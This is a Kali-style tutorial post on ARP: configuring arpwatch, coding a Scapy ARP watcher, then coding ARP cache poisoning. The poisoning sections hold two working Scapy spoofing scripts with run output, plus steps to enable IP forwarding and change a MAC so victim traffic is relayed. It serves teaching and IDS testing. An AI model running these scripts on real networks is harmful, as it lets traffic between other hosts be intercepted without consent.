                                                                                                                                                                                     
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo mkdir /var/log/arpwatch                                                                                                                                                    1 ⨯ 1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo touch /var/log/arpwatch/arpwatch.log                                                                                                                                           1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo chmod 666 /var/log/arpwatch/arpwatch.log                                                                                                                                       1 ⚙
    

     

     

    And restart the rsyslog daemon:

     

     

                                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl restart rsyslog                                                                                                                                                127 ⨯ 1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$           
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
    └─$ sudo systemctl status rsyslog                                                                                                                                                       1 ⚙
    ● rsyslog.service - System Logging Service
         Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
         Active: active (running) since Mon 2022-01-24 09:51:27 IST; 4min 30s ago
    TriggeredBy: ● syslog.socket
           Docs: man:rsyslogd(8)
                 man:rsyslog.conf(5)
                 https://www.rsyslog.com/doc/
       Main PID: 23919 (rsyslogd)
          Tasks: 4 (limit: 4366)
         Memory: 1.6M
            CPU: 173ms
         CGroup: /system.slice/rsyslog.service
                 └─23919 /usr/sbin/rsyslogd -n -iNONE
    
    Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Starting System Logging Service...
    Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Started System Logging Service.
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd.  [v8.2110.0]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: [origin software="rsyslogd" swVersion="8.2110.0" x-pid="23919" x-info="https://www.rsyslog.com"] start
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
    └─$           
    
    


    And now you can see the messages from the working arpwatch daemon:

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$                                                                                                                                                                               130 ⨯ 2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ cat /var/log/arpwatch/arpwatch.log   
                                                                                                                                             
    Jan 25 18:10:07 KumarAtulJaiswal arpwatch: exiting
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch: Running as uid=140 gid=149
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch: listening on wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch: new station 192.168.249.45 08:00:27:67:67:30 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
    
    

     

    arpwatch MAC address files 

    The default directory for the arpwatch MAC address database is /var/lib/arpwatch. There is one file per interface, named IFNAME.dat (for example wlan0.dat); each line holds a MAC address, an IP address, a Unix timestamp and the interface. You can print the database content:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ cat /var/lib/arpwatch/wlan0.dat                                                                                                                                                 1 ⨯ 2 ⚙
    fc:01:7c:29:00:77       192.168.122.30  1643114422              wlan0
    fc:01:7c:29:00:77       192.168.122.25  1643045197              wlan0
    e6:e4:e4:95:1e:27       192.168.122.158 1643045197              wlan0
    e6:e4:e4:95:1e:27       192.168.249.79  1643119787              wlan0
    fc:01:7c:29:00:77       192.168.249.25  1643119770              wlan0
    fc:01:7c:29:00:77       192.168.249.45  1643119787              wlan0
    08:00:27:67:67:30       192.168.249.45  1643119391              wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$      
    

     

     

    NOTE - When you run the arpwatch daemon for the first time, the database file is empty. You have to restart the arpwatch daemon first to see any content. 

     

     

    ARP watcher 

    Now we code our own ARP watcher.

     

     

    #!/usr/bin/python3
    from scapy.all import sniff, ARP
    from signal import signal, SIGINT
    import sys

    # File in which the known IP -> MAC pairs are kept between runs, one "ip mac" per line
    arp_watcher_db_file = "/var/cache/arp-watcher.db"
    ip_mac = {}


    # Save ARP table on shutdown
    def sig_int_handler(signum, frame):
        print("Got SIGINT. Saving ARP database...")
        try:
            with open(arp_watcher_db_file, "w") as f:
                for (ip, mac) in ip_mac.items():
                    f.write(ip + " " + mac + "\n")
            print("Done.")
        except IOError:
            print("Cannot write file " + arp_watcher_db_file)
            sys.exit(1)
        sys.exit(0)


    def watch_arp(pkt):
        # got is-at pkt (ARP response)
        if pkt[ARP].op == 2:
            print(pkt[ARP].hwsrc + " " + pkt[ARP].psrc)
            # Device is new. Remember it.
            if ip_mac.get(pkt[ARP].psrc) is None:
                print("Found new device " + pkt[ARP].hwsrc + " " + pkt[ARP].psrc)
                ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
            # IP is known but is now answered by a different MAC: probably forged
            elif ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
                print(pkt[ARP].psrc + " has got new MAC " + pkt[ARP].hwsrc
                      + " (old " + ip_mac[pkt[ARP].psrc] + ")")
                ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc


    if len(sys.argv) < 2:
        print(sys.argv[0] + " <iface>")
        sys.exit(0)

    # Load the resolutions saved by a previous run, or exit if the file cannot be read
    try:
        fh = open(arp_watcher_db_file, "r")
    except IOError:
        print("Cannot read file " + arp_watcher_db_file)
        sys.exit(1)

    for line in fh:
        line = line.rstrip("\n")
        if not line:
            continue
        (ip, mac) = line.split(" ")
        ip_mac[ip] = mac
    fh.close()

    # Save the table on Ctrl-C, then sniff ARP packets on the given interface
    signal(SIGINT, sig_int_handler)
    sniff(prn=watch_arp,
          filter="arp",
          iface=sys.argv[1],
          store=0)
    
    

     

     

    python arpwatch.py iface

    python arpwatch.py wlan0

     

    At the start we define a signal handler in sig_int_handler() that gets called if the user interrupts the program. This function saves all known IP to MAC resolutions from the ip_mac dictionary to a file. Afterwards we read that ARP database file to initialize the program with all currently known resolutions, or exit if the file cannot be read. Then we loop line by line through the file's content and split each line into IP and MAC to store them in the ip_mac dictionary. Now we call the already known function sniff(), which invokes the callback function watch_arp for every received ARP packet.


    The function watch_arp implements the real logic of the program. When the sniffed packet is an is-at packet, and therefore an ARP response, we first check whether the IP exists in the ip_mac dictionary. If we don't find an entry, the device is new and a message is shown on the screen; otherwise we compare the MAC address with the MAC in our dictionary. If it differs, the response is probably forged and we print a message to the screen. In both cases the dictionary gets updated with the new information.
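    As an added example (not the page's or arpwatch's own code), the same ip -> mac check the watcher makes on live replies can be run offline over the IFNAME.dat database from the arpwatch section above: replaying the rows in timestamp order reproduces the "new station" and "changed ethernet address" messages seen in arpwatch.log. Treating the fourth column of the .dat file as the interface is an assumption taken from the wlan0.dat listing.

```python
import re

# Added example, not the page's or arpwatch's own code: the ip -> mac check the
# arp-watcher above makes on live ARP replies, run offline over arpwatch's
# IFNAME.dat database. A line is "MAC IP epoch [iface]"; reading the fourth
# column as the interface is an assumption taken from the wlan0.dat listing.

# Sample database, copied from the wlan0.dat listing on this page.
WLAN0_DAT = """\
fc:01:7c:29:00:77\t192.168.122.30\t1643114422\t\twlan0
fc:01:7c:29:00:77\t192.168.122.25\t1643045197\t\twlan0
e6:e4:e4:95:1e:27\t192.168.122.158\t1643045197\t\twlan0
e6:e4:e4:95:1e:27\t192.168.249.79\t1643119787\t\twlan0
fc:01:7c:29:00:77\t192.168.249.25\t1643119770\t\twlan0
fc:01:7c:29:00:77\t192.168.249.45\t1643119787\t\twlan0
08:00:27:67:67:30\t192.168.249.45\t1643119391\t\twlan0
"""

MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$")

def parse_arpwatch_dat(text):
    """Return (mac, ip, epoch, iface) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 3 or not MAC_RE.match(f[0].lower()) or not f[2].isdigit():
            continue
        rows.append((f[0].lower(), f[1], int(f[2]), f[3] if len(f) > 3 else ""))
    return rows

class ArpTracker:
    """The same ip -> mac dictionary the arp-watcher script keeps in memory."""

    def __init__(self):
        self.ip_mac = {}

    def observe(self, ip, mac):
        """Return ("new", None), ("changed", old_mac) or None for one reply."""
        old = self.ip_mac.get(ip)
        if old is None:
            self.ip_mac[ip] = mac
            return ("new", None)
        if old != mac:          # known IP now answered by another MAC
            self.ip_mac[ip] = mac
            return ("changed", old)
        return None

def replay(rows):
    """Feed rows to the tracker in time order; return the messages arpwatch
    would have logged for the same sequence of sightings."""
    tracker = ArpTracker()
    events = []
    for mac, ip, epoch, iface in sorted(rows, key=lambda r: r[2]):
        result = tracker.observe(ip, mac)
        if result is None:
            continue
        kind, old = result
        if kind == "new":
            events.append(f"new station {ip} {mac} {iface}")
        else:
            events.append(f"changed ethernet address {ip} {mac} ({old}) {iface}")
    return events
```

    The last event produced for the listing is the same flip of 192.168.249.45 from 08:00:27:67:67:30 to fc:01:7c:29:00:77 that arpwatch.log reported above.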

     

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • Code your own ARP Cache Poisoning


    Code your own ARP Cache Poisoning



    ARP-Cache-Poisoning


    The functionality of the ARP protocol (Address Resolution Protocol) was described in another of our posts (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html). A computer that wants to send an IP packet to another host must first request the MAC address of the destination by using the ARP protocol. This question gets broadcast to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim such an ARP reply packet every few seconds, but with its own MAC address as the response, and thus redirect the connection to itself.


    This works because most operating systems accept response packets to questions they never asked!
     

    Let's write the code in Python:

     

     

    #!/usr/bin/python
    
    import sys
    import time
    from scapy.all import sendp, ARP, Ether
    
    if len(sys.argv) < 3:
        print(sys.argv[0] + ": <target> <spoof_ip>")  #victim ip and Fake IP, sudo python3 arpcache.py 192.168.122.45 192.168.122.30 
        sys.exit(1)
    
    iface = "wlan0"
    target_ip = sys.argv[1]
    fake_ip = sys.argv[2]
    
    widelan = Ether()              #before widelan/ether (www.kumaratuljaiswal.in)
    arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
    
    packet = widelan / arp
    
    while True:
        sendp(packet, iface=iface)
        time.sleep(10)
        
    
    
    







    With the help of Scapy we construct a packet called packet consisting of an Ether() and an ARP() header. In the ARP header we set the IP address of the victim (target_ip) and the IP whose connections we would like to hijack (fake_ip). As the last parameter we define the OP code is-at, which declares the packet as an ARP response. Afterwards the function sendp() sends the packet in an endless loop, waiting 10 s between each delivery. It's important to note that you have to call the function sendp() and not the function send(), because the packet should be sent on layer 2. The function send() sends packets on layer 3.

     

     


     

     

     



    Additional detail - let's read


    For a short refresher:

    Ethernet is on layer 2, IP (Internet Protocol) on layer 3, TCP (Transmission Control Protocol) or UDP on layers 4–6 and services like HTTP, SMTP, FTP on layer 7.



    NOTE - One last thing to remember is to enable IP forwarding, otherwise your host would block the connection of the victim.




    IP Forwarding


    Why do we need IP forwarding with Scapy (arpcache)? Don't worry if you don't know; let's see. If the Linux server is acting as a firewall, router, or NAT device, it needs to be capable of forwarding packets that are meant for other destinations (other than itself).

    Conversely, IP forwarding should usually be turned off if you’re not using one of the aforementioned configurations. You typically don’t want your system wasting bandwidth or resources to forward packets elsewhere, unless it’s been designed to do that job.



    Check current IP forwarding status


    Most systems will be able to use the sysctl command, which can apply kernel variables. Therefore, you can use the following sysctl command to check whether IP forwarding is enabled or disabled.

    # sysctl net.ipv4.ip_forward
    net.ipv4.ip_forward = 0

    In the example above, the net.ipv4.ip_forward kernel setting is 0. That means it’s off. If it were set to 1, that would mean it’s enabled.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sysctl net.ipv4.ip_forward       
    net.ipv4.ip_forward = 0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    



    You can also check whether it is enabled by reading the file directly: cat /proc/sys/net/ipv4/ip_forward



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ cat /proc/sys/net/ipv4/ip_forward
    0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    
    




    Enable or disable IP forwarding


    You can use the following sysctl command to enable or disable Linux IP forwarding on your system.

    # sysctl -w net.ipv4.ip_forward=0
    OR
    # sysctl -w net.ipv4.ip_forward=1




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sudo sysctl net.ipv4.ip_forward=1
    net.ipv4.ip_forward = 1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    
    
    
    

    Again we check the IP forwarding setting to confirm that it is now enabled:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sysctl net.ipv4.ip_forward       
    net.ipv4.ip_forward = 1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
     


     

     


     

     

     

    Don't forget to check the settings of your packet filter like iptables, pf or ipfw, or just disable it. But now enough about the boring theory, let's jump into some practical Python code!

    If you only manipulate the ARP cache of the client with the fake_ip you only get the packets of the client, but the responses of the server will stay invisible.










    To force a bidirectional connection through the computer of the attacker, as shown above, the attacker has to fool both the client and the server with his own MAC for the relevant destination. Our first code is a bit graceless and sends a lot of ARP packets. It doesn't only generate more traffic than needed, it's also conspicuous. Stealthy attackers would use another tactic. A computer that wants to learn about an IP address asks with an ARP request.




    Additional Details-


    What is Stealth ?


    A stealth scan or half-open scan is one of the scanning methods in Nmap which an intruder uses to bypass firewalls and authentication mechanisms. Also, by using this method, they make the scan operation look like normal network traffic and thus the scan is hidden.



    We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request. In a switched environment this will result in every connection flowing over the computer of the attacker, because every ARP cache will contain the attacker's MAC for every IP address. This solution is more elegant and not as noisy as the one before, but still quite easy for a trained admin to detect. The spoofed response packet gets sent in parallel to the response of the real host, as illustrated in Fig a.png. The computer whose packet arrives first at the victim's network card wins.






    MAC Address change


    Every network card in an Ethernet network has a MAC address that's world-wide unique and is used to address devices on the net. The MAC address consists of six two-digit hexadecimal numbers, which are separated by colons (e.g. aa:bb:cc:11:22:33).

    It's a common misconception that a computer in a local TCP/IP network is reached over its IP address; in reality the MAC address is used for this purpose. Another common misunderstanding is that the MAC address cannot be spoofed. The operating system is responsible for writing the MAC into the Ethernet header, and systems like GNU/Linux or *BSD have possibilities in their base system to change the MAC with one command.


    Also read - https://www.kumaratuljaiswal.in/2020/04/how-to-change-mac-address-with-mac.html



    Changing the MAC address (command) -

    Before / After


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ ifconfig
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ sudo ifconfig eth0 hw ether c0:de:de:ad:be:e
    
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ ifconfig                                    
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether c0:de:de:ad:be:0e  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ 
    
    



    We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request.

     


    import sys
    import time
    from scapy.all import sniff, sendp, ARP, Ether
    
    # Usage check: the interface is the only argument
    if len(sys.argv) < 2:
        print(sys.argv[0] + " <iface>")
        sys.exit(0)
    
    
    def arp_poison_callback (packet):
        #Got ARP request
        if packet[ARP].op == 1:
            answer = Ether(dst=packet[ARP].hwsrc) / ARP()
            answer[ARP].op = "is-at"
            answer[ARP].hwdst = packet[ARP].hwsrc
            answer[ARP].psrc = packet[ARP].pdst
            answer[ARP].pdst = packet[ARP].psrc
    
            print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me")
            sendp(answer, iface=sys.argv[1])
    
    
    sniff(prn=arp_poison_callback,
          filter="arp",
          iface=sys.argv[1],
          store=0)
    
    
    
    
    



    The function sniff() reads packets in an endless loop from the interface specified by the parameter iface. The received packets are automatically filtered by the PCAP filter arp that guarantees that our callback function arp_poison_callback will only get called with ARP packets as input. Due to the parameter store=0 the packet will only be saved in memory but not on the hard disk. The function arp_poison_callback() handles the real work of our program.

    First of all it checks the OP code of the ARP packet: when it's 1 the packet is an ARP request and we generate a response packet that has the source MAC and IP of the request packet as destination MAC and IP. We don't define a source MAC, thus Scapy automatically inserts the addresses of the sending network interface.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$                                                                                                                                                                                     
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo python3 arpcache-2.py wlan0 
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.158 that 192.168.122.25 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.158 that 192.168.122.25 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    ^C
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$    
    
    
    




    The IP to MAC resolution of ARP will get cached for some time, because it would be dumb to ask for the resolution of the same address over and over again. This ARP cache can be displayed with the following command.



    arp -an



    It depends on the operating system, its version and local configuration settings on how long addresses will get cached.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ arp -an                                                                                                                                                                       148 ⨯ 3 ⚙
    ? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$              
    
    
    
    


    To defend against ARP poisoning attacks one could, on the one hand, use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system; on the other hand one could use a tool such as an ARP watcher.  
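    As an added example (not from the page), here is a point-in-time audit of the local ARP cache that complements both defenses: it parses the `arp -an` output shown on this page and reports pinned addresses whose cached MAC differs from the expected one, as well as MACs that claim more than one IP. The snapshot (apart from the .158 line, which is the page's own) and the pinned table are constructed.

```python
import re
from collections import defaultdict

# Added example (not the page's code): audit a snapshot of `arp -an` on Linux.
# Each line has the shape shown above:
#   ? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
# Unresolved entries show "<incomplete>" instead of a MAC, and net-tools
# prints PERM after "[ether]" for static (permanent) entries.
ARP_LINE = re.compile(
    r"^\S+ \((?P<ip>[0-9.]+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}|<incomplete>)"
    r"(?: \[\w+\])?(?P<flags>(?: [A-Z]+)*) on (?P<iface>\S+)$"
)

# Constructed snapshot: the .158 line is the page's own, the rest is made up.
ARP_SNAPSHOT = """\
? (192.168.122.1) at 02:00:00:00:00:01 [ether] PERM on wlan0
? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
? (192.168.122.25) at fc:01:7c:29:00:77 [ether] on wlan0
? (192.168.122.45) at fc:01:7c:29:00:77 [ether] on wlan0
? (192.168.122.99) at <incomplete> on wlan0
"""

# Constructed known-good table, e.g. the entries you pinned with `arp -s`.
PINNED = {
    "192.168.122.1": "02:00:00:00:00:01",
    "192.168.122.45": "08:00:27:67:67:30",
}

def parse_arp_table(text):
    """Parse `arp -an` output into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if not m:
            continue
        entries.append({
            "ip": m["ip"],
            "mac": m["mac"].lower(),
            "permanent": "PERM" in m["flags"].split(),
            "iface": m["iface"],
        })
    return entries

def audit_arp_table(entries, pinned):
    """Return findings: pinned IPs whose cached MAC differs from the expected
    one, and MACs that claim several IPs (one host answering for many)."""
    findings = []
    ips_by_mac = defaultdict(list)
    for e in entries:
        if e["mac"] == "<incomplete>":
            continue                      # nothing resolved yet, nothing to judge
        ips_by_mac[e["mac"]].append(e["ip"])
        expected = pinned.get(e["ip"])
        if expected and e["mac"] != expected.lower():
            findings.append(("mismatch", e["ip"], e["mac"], expected))
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("shared-mac", mac, tuple(sorted(ips))))
    return findings
```

    A shared MAC is not always an attack (a router answering for several addresses via proxy ARP looks the same), so treat the findings as alerts to verify, the way an ARP watcher's reports are.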

     

     

     

    arp cache

     

     

     

    An ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the functionality of your IDS by using the above scripts to see how it behaves.

     

    To be Continued......


